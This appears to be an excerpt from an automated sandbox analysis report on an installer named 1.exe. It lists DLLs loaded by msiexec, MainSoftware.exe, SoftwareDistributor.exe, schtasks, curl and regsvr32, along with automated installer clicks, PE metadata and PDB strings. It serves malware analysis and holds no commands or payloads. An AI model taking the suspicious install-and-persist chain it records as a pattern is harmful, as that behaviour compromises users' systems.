    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: icu.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshunix.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: winrnr.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wshbth.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: napinsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: uxtheme.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: propsys.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: edputil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: urlmon.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: srvcli.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: wintypes.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: appresolver.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: bcp47langs.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: slc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: sppc.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Program Files (x86)\Main\MainSoftware.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: icu.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winnsi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winhttp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: mswsock.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wshunix.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: winrnr.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: rasadhlp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: nlaapi.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: wshbth.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: pnrpnsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: napinsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: schannel.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Main\Chop\Install.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: apphelp.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\1.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\1.exeAutomated click: I accept the terms in the License Agreement
    Source: C:\Users\user\Desktop\1.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\1.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\1.exeAutomated click: Install
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 1.exeStatic PE information: certificate valid
    Source: 1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: 1.exeStatic file information: File size 34378808 > 1048576
    Source: 1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c9200
    Source: 1.exeStatic PE information: More than 200 imports for KERNEL32.dll
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: 1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
